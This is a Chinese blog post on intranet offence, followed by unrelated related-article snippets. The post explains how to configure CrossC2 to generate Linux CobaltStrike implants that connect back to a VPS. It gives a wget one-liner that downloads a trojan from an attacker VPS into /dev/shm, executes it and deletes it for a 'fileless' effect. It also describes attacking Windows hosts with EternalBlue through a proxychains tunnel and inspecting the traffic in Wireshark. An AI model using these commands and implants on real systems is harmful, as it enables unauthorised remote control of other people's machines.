一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊
这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。
但是总不能不更吧 
那就讲一下进来的一些内网攻防的思考吧
1.CrossC2上线Linux到CS(成功)
我么众所周知,CS是不能生成以及上线Linux的(再不配置插件的情况下),那么我们今天就带大家来配一下这个上线cs的插件
我就去kali上演示啦(你们在VPS上也是一样的,不过我VPS上已经配置好了,就不麻烦再配一次了)
我们先去github上下载这两个文件
GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
然后我们先去解压缩那个ZIP
然后我们去CS加载这两个文件
这样,我们的CS就配置好了,然后我们去生成Linux的木马,找到另外的那个gen...linux的
先改权限,然后生成
./genCrossC2.Linux 你的VPS的ip VPS监听器的端口 null null Linux x64 木马名字所以我就这么写咯
./genCrossC2.Linux 192.168.246.170 9191 null null Linux x64 muma这里可以看见它的支持版本是4.9-4.1 ,要注意版本噢
然后我们去配置CS的监听器(只支持https 和tcp)
这个生成木马我应该就不用教了吧,不过记得要和木马对应IP和端口噢
然后就是去目标Linux上运行木马了!!!
但是呢,就真无语了
cs非常的安静
就连本地自己启动都上线不了。。。。。。。
我真无语了,那就用VPS上线一下吧!!!
还是先创建监听器,然后生成🐎
丢到目标服务器上去运行
可以看见两台机器都能上线,看来以后还是用VPS吧!!!
2.Bash无文件落地??
我们众所周知,Windos最出名的无文件落地,一定是powershell无文件落地(当然还有别的)
但是Linux呢??? 那肯定得有对应的无文件落地的啦!!! 下面这个连接讲的很详细
blogs/持久控制/Linux/Linux下的无文件攻击.md at master · aplyc1a/blogs · GitHub
这些方法好是好,但是对于脚本小子不友好!!! 假如我现在有一个Linux的马,然后又是脚本小子呢??
::: 我也想无文件啊!!!
那么就有接下来的命令
wget -U O -O - http://公网VPS/木马 > /dev/shm/木马 && chmod +x /dev/shm/木马 && /dev/shm/木马 && rm -f /dev/shm/木马
- 使用
wget命令从公网VPS的地址下载文件。 >符号将下载的文件内容输出到/dev/shm/木马文件中。&&符号表示如果前一个命令执行成功,则继续执行下一个命令。- 使用
chmod命令添加/dev/shm/木马文件的执行权限。 - 使用
/dev/shm/木马命令执行该文件,这个文件可能是一个 shell 脚本或可执行文件。 - 最后,使用
rm -f命令删除/dev/shm/木马文件。
这个命令下载的文件被保存在
/dev/shm目录下,该目录是一个临时文件系统,通常被用作内存文件系统,因此文件实际上是保存在内存中的。因此,即使在磁盘上删除了文件,内存中仍然存在这个文件的拷贝,因此删除磁盘上的文件不会影响正在内存中执行的程序。
所以你觉得这个算是无文件吗????
::感觉似乎不算,毕竟还有有文件落地得(只不过达到了一种类似无文件得效果)
那么下面就来演示一下,现在VPS上面开一个http得服务
然后直接一句话bash无文件落地
wget -U O -O - http://VPS:6888/shell > /dev/shm/shell && chmod +x /dev/shm/shell && /dev/shm/shell && rm -f /dev/shm/shell
直接上线
然后我们去看一下是否真的无文件(看一下目录下有没有)
但是在内存中还是能看见得
3.永恒之蓝shell进去会建立一个session?
以前我不是做过这样的一个实验吗?? 挂着跳板机去打内网的机器,很多时候本地不成功!!
那么我们今天Wireshark的角度上去分析一下!!!!!
首先是一台Win7(存在永恒之蓝)
然后就是一台Server(也存在永恒之蓝)
首先我的Kali是192.168.246.170,先把他放在同一网段来打一下先
然后我们再去打一下Win7
好,两台都是能打到的,那么,我们把Win7放在内网,winserver放在公网
然后win7就变成内网52这个网段
然后winserver是双网卡,同时通两个网
然后我们去Winserver上开一个socks5的隧道!!!
然后我用kali的proxychains去连接
然后我们用proxychains去启动msf
果然打不成功,这个可能是因为虚拟机网络摇曳的原因,然而,今天我想讲的是另外一个东西
还是拿回我们原来的那个攻击成功的机器,我们众所周知,永恒之蓝是通过别人开放的445端口进行攻击的,那么他是通过445进行连接的吗????
我们在进攻成功之后,就可以有一个meterpreter的界面,然后我们去看一下连接
我们不难发现,我们并不是通过445端口进行连接的,而是通过重新找了一个端口来连接我们的kali 那么另外又一个问题来了,我们shell的时候,会建立一个新的连接吗??(PORT)
于是我shell了进去,并且抓了一下数据包,我们不难发现,我们kali都是通过用的4444端口进行对win7的通信,并不存在说新建立了一个端口来通信!!! 那执行命令呢????
可以看到它的整个tcp流,也是没有建立新的端口
所以我们就可以得到一个结论,只要我们能通过proxychains打到内网,那么就不用担心会新建端口导致的流量不通!!!
所以以上失败的原因就是虚拟机摇曳!!!!!!
以上,就是一些暂时的想法了,写完这篇,小编又要投身到另一篇csdn上了!!!!
相关文章:
一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊 这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。 但是总不能不更吧 那就讲一下进来的一些内网攻防的思考吧 1.CrossC2上线Linux到CS(成功) …...
数据结构--顺序表和链表的区别
顺序表和链表之间各有优劣,我们不能以偏概全,所以我们在使用时要关注任务的注重点,以此来确定我们要使用两者中的哪一个。 不同点: 存储空间上: 顺序表在物理结构上是一定连续的,而链表(这里以带头双向循环…...
【技术分享】 OPC UA安全策略证书简述
那什么是OPC UA证书?用途是什么? 简单来说它是身份验证和权限识别。 OPC UA使用X.509证书标准,该标准定义了标准的公钥格式。建立UA会话的时候,客户端和服务器应用程序会协商一个安全通信通道。数字证书(X.509&#x…...
【Neo4jJDK开箱即用的安装全流程】
neo4j:命令行本地访问loclhost neo4j:命令行本地访问loclhost2 neo4j操作 Neo4j桌面版数据库导出导入 Neo4j安装与配置以及JDK安装与配置教程(超详细) Neo4j 安装、使用教程 Neo4j安装教程 Neo4J桌面版的配置和连接Pycharm jdk-neo对应版本 JDK ORACLE中…...
Linux 操作系统多路IO复用
1.多路IO复用 多路I/O复用是通过一种机制,可以监视多个描述符,一旦某个描述符就绪(一般是读就绪或者写就绪),能够通知程序进行相应的读写操作。 这个机制能够通过select/poll/eroll等来使用。这些函数都可以同时监视多…...
读取shape文件中数据
读取shape文件中数据 pom文件中引入依赖 <dependency><groupId>org.geotools</groupId><artifactId>gt-shapefile</artifactId><version>26.4</version></dependency>如果jar包下载不下来,在pom中添加下geotools的仓库 <…...
基于STM32F401RET6智能锁项目(使用库函数点灯、按键)
点灯硬件原理图 1、首先,我们查看一下原理图,找到相对应的GPIO口 LED_R低电平导通,LED4亮,所以LED_R的GPIO口需要配置一个低电平才能亮; LED_G低电平导通,LED3亮,所以LED_R的GPIO口需要配置一…...
网络层协议之 IP 协议
IP 协议格式 4 位版本:此处的取值只有两个,4(IPv4)和 6(IPv6),即指定 IP 协议的版本。 4 位首部长度:描述了 IP 报头多长,IP 报头是变长的,因为报头中的选项部…...
SpringBoot 实现对提供的接口进行 AES (加密,解密)
业务来源: 最近工作中,领导要求给别的项目组的小伙伴提供几个接口,要求对接口的参数进行解密操作,然后对返回的数据进行加密操作。 这时我想到了AES AES 是对称加密算法,优点:加密速度快;缺点…...
ASP.NET学生成绩管理系统
摘要 本系统依据开发要求主要应用于教育系统,完成对日常的教育工作中学生成绩档案的数字化管理。开发本系统可使学院教职员工减轻工作压力,比较系统地对教务、教学上的各项服务和信息进行管理,同时,可以减少劳动力的使用…...
谁考了第k名C++
题目描述 在一次考试中,每个学生的成绩都不相同,现知道了每个学生的学号和成绩,求考第k名学生的学号和成绩。(按成绩从大到小排列) 输入 第一行有两个整数,分别是学生的人数n(1≤n≤100&…...
多线服务器的优势有哪些?
服务器中包含着多线服务器、双线服务器和单线服务器等,其中多线服务器可以支持多个IP地址,今天小编就来带领大家一些来了解一下多线服务器的优势有哪些吧! 多线服务器是在一个互联网数据中心,通过特殊的技术手段将不同的多家网络接…...
vue + element-plus 开发中遇到的问题
1.问题之路由守卫 初写路由守卫,对于next()的理解不是很透彻,就想着都放行,不然看不到效果,结果控制台出现了警告,想着报黄的问题就不是问题,但仔细一看发现他说,如果再生产阶段就会失败&#x…...
使用java远程提交flink任务到yarn集群
使用java远程提交flink任务到yarn集群 背景 由于业务需要,使用命令行的方式提交flink任务比较麻烦,要么将后端任务部署到大数据集群,要么弄一个提交机,感觉都不是很离线。经过一些调研,发现可以实现远程的任务发布。…...
麻了!新增4.1分,CCF-C类,2区毕业神刊,被标记On Hold!
本周投稿推荐 SSCI • 2区社科类,3.0-4.0(社科均可) EI • 计算机工程类(接收广,录用极快) SCI&EI • 4区生物医学类,1.5-2.0(录用率99%) • 1区工程类&#…...
tomcat 的启动流程
tomcat 的启动流程 中 使用的Lifecycle 生命流程 。在这里还使用了设计模式中的模板模式(LifecycleBase 是一个模板类) init()方法 start() 方法 container 的处理...
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!!
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!! YOLOv9原文链接戳这里,原文全文翻译请关注B站Ai学术叫叫首er …...
PCIE协议-2-事务层规范-MEM/IO/CFG request rules
2.2.7 内存、I/O和配置请求规则 以下规则适用于所有内存、I/O和配置请求。每种类型的请求还有特定的额外规则。 所有内存、I/O和配置请求除了常见的头标字段外,还包括以下字段:requester ID[15:0]和Tag[9:0],形成事务ID。Last DW BE[3:0] a…...
jmeter分布式集群压测
目的:通过多台机器同时运行 性能压测 脚本,模拟更好的并发压力 简单点:就是一个人(控制机controler/调度机 master)做一个项目的时候,压力有点大,会导致结果不理想,这时候找几个人&a…...
美国加州正测试ChatGPT等生成式AI,在4大部门应用
5月11日,美联社消息,美国加州政府正在测试ChatGPT等生成式AI,应用在税收和收费管理部、交通部、公共卫生部以及卫生与公众服务部4大部门。 测试时间6个月,为其提供技术支持的一共有5家公司,分别是OpenAI、Anthropic、…...
4个高效步骤实现HMCL启动器数据无忧迁移全攻略
4个高效步骤实现HMCL启动器数据无忧迁移全攻略 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL 当你终于升级了新电脑,兴冲冲地安装好HMCL启动器准备…...
小白友好:Python3.8镜像5分钟部署教程,轻松管理多个项目环境
小白友好:Python3.8镜像5分钟部署教程,轻松管理多个项目环境 1. 为什么需要Python3.8镜像 Python作为当下最流行的编程语言之一,被广泛应用于Web开发、数据分析、人工智能等各个领域。但在实际开发中,我们经常会遇到这样的困扰&…...
)
QT开发环境搭建:如何在Linux上快速配置Python和C++支持(含清华镜像源加速)
Linux下高效搭建QT开发环境:Python与C双语言支持实战指南 在Linux系统上搭建QT开发环境是许多跨平台应用开发者的必经之路。不同于Windows或macOS的一键式安装,Linux环境下的配置往往需要处理更多依赖关系和系统级设置。本文将带你从零开始,在…...
搞懂 Python 本地安装:`pip install .` 与 `pip install -e .` 的本质区别
在 Python 项目开发中,当你编写了一个自己的包(包含 setup.py 或 pyproject.toml),并希望将其安装到当前的虚拟环境以便调用时,通常会在项目根目录执行安装命令。 最常见的两个命令是 pip install . 和 pip install -e…...
OpenClaw自动化测试:Gemma-3-12b-it驱动浏览器操作与结果校验
OpenClaw自动化测试:Gemma-3-12b-it驱动浏览器操作与结果校验 1. 为什么选择OpenClawGemma做自动化测试? 上周我在重构一个老旧的Web项目时,遇到了一个典型痛点:前端页面改版后,原有的Selenium测试脚本大面积失效。动…...
Python 日志神器 Loguru 超详细使用教程
前言 在 Python 开发中,日志记录是排查问题、监控程序运行的核心工具,但原生 logging 库配置繁琐、语法复杂,新手很难快速上手。Loguru 是一款极简、强大、开箱即用的第三方日志库,无需复杂配置,一行代码就能实现专业级…...
Gumbo-parser内存管理终极指南:7个简单步骤避免常见陷阱
Gumbo-parser内存管理终极指南:7个简单步骤避免常见陷阱 【免费下载链接】gumbo-parser An HTML5 parsing library in pure C99 项目地址: https://gitcode.com/gh_mirrors/gu/gumbo-parser Gumbo-parser是一个纯C99编写的HTML5解析库,高效的内存…...
本地AI模型开发终极指南:从零开始构建智能应用社区
本地AI模型开发终极指南:从零开始构建智能应用社区 【免费下载链接】gallery A gallery that showcases on-device ML/GenAI use cases and allows people to try and use models locally. 项目地址: https://gitcode.com/GitHub_Trending/gallery44/gallery …...
illa-helper开发者深度教程:如何扩展新的翻译服务提供商
illa-helper开发者深度教程:如何扩展新的翻译服务提供商 【免费下载链接】illa-helper 浸入式学语言助手 (Immersive Language Learning Assistant) 项目地址: https://gitcode.com/gh_mirrors/il/illa-helper 浸入式学语言助手是一个基于"i1"可理…...
嵌入式工程师职业发展:原厂与方案商技术深度对比
1. 嵌入式工程师的职业抉择:原厂与方案商深度对比最近一位工作三年的嵌入式工程师朋友分享了他的求职经历,让我感触颇深。他在方案商做了三年应用开发后,最终选择跳槽到芯片原厂。这个决定背后,反映了很多嵌入式工程师都会面临的职…...